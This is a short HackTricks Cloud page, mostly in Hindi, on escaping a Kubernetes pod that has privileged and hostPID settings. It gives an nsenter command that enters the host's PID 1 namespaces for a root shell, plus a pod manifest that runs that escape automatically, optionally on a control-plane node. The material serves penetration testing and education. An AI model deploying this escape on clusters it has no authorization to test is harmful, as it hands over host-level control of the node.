Pod Escape Privileges
Tip
सीखें और अभ्यास करें AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
सीखें और अभ्यास करें GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
सीखें और अभ्यास करें Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- देखें subscription plans!
- शामिल हों 💬 Discord group या telegram group या हमें फ़ॉलो करें Twitter 🐦 @hacktricks_live.
- PRs सबमिट करके hacking tricks साझा करें HackTricks और HackTricks Cloud github repos.
Privileged and hostPID
इन विशेषाधिकारों के साथ, आपके पास होस्ट की प्रक्रियाओं तक पहुंच होगी और होस्ट प्रक्रियाओं में से एक के नामस्थान के अंदर प्रवेश करने के लिए पर्याप्त विशेषाधिकार होंगे।
ध्यान दें कि आपको संभावित रूप से विशेषाधिकार की आवश्यकता नहीं हो सकती है, बल्कि केवल कुछ क्षमताएँ और अन्य संभावित रक्षा बाईपास (जैसे apparmor और/या seccomp) की आवश्यकता हो सकती है।
बस निम्नलिखित में से कुछ चलाने से आपको पॉड से बाहर निकलने की अनुमति मिलेगी:
nsenter --target 1 --mount --uts --ipc --net --pid -- bash
कॉन्फ़िगरेशन उदाहरण:
apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command:
[
"nsenter",
"--target",
"1",
"--mount",
"--uts",
"--ipc",
"--net",
"--pid",
"--",
"bash",
]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Tip
सीखें और अभ्यास करें AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
सीखें और अभ्यास करें GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
सीखें और अभ्यास करें Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
HackTricks का समर्थन करें
- देखें subscription plans!
- शामिल हों 💬 Discord group या telegram group या हमें फ़ॉलो करें Twitter 🐦 @hacktricks_live.
- PRs सबमिट करके hacking tricks साझा करें HackTricks और HackTricks Cloud github repos.
HackTricks Cloud

